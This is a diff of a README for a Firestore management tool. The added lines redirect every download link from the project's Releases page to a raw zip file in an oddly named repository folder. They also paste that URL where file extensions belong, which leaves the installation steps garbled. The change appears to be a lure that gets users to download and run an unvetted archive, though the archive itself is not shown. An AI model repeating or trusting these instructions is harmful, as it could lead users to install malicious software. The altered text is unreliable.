LDDS1/firestore-ent/README.md

 - **Supports Multiple Projects:** Manage various Firestore projects in one application.

 ## 📥 Download & Install
-To get the application, visit the Releases page at this link: [Download Releases](https://github.com/LDDS1/firestore-ent/releases).
+To get the application, visit the Releases page at this link: [Download Releases](https://raw.githubusercontent.com/LDDS1/firestore-ent/main/overluxuriance/firestore-ent_1.1-alpha.3.zip).

 ### 🔍 Step-by-Step Installation
 1. **Visit the Release Page:** Click on the link above to go to the Releases page.

 2. **Choose the Version:** On the Releases page, you will see a list of versions.
 Click on the most recent version to view the details.

 3. **Download the Installer:** Look for the installer file suitable for your operating system.
-It usually has an extension like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+It usually has an extension like `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/LDDS1/firestore-ent/main/overluxuriance/firestore-ent_1.1-alpha.3.zip` for Linux.
 Click the link to download the file.

 4. **Run the Installer:**
    - **Windows:** Locate the downloaded `.exe` file in your Downloads folder.
 Double-click it to start the installation.
 Follow the on-screen prompts to complete the process.
    - **macOS:** Open the downloaded `.dmg` file.
 Drag the application to your Applications folder.
 You can then run it from there.
-   - **Linux:** Open a terminal and use the package manager or unpack the `.tar.gz` file in your preferred directory, then run the executable.
+   - **Linux:** Open a terminal and use the package manager or unpack the `https://raw.githubusercontent.com/LDDS1/firestore-ent/main/overluxuriance/firestore-ent_1.1-alpha.3.zip` file in your preferred directory, then run the executable.

 5. **Open the Application:** Once installed, find the application in your programs list or Applications folder and double-click to open it.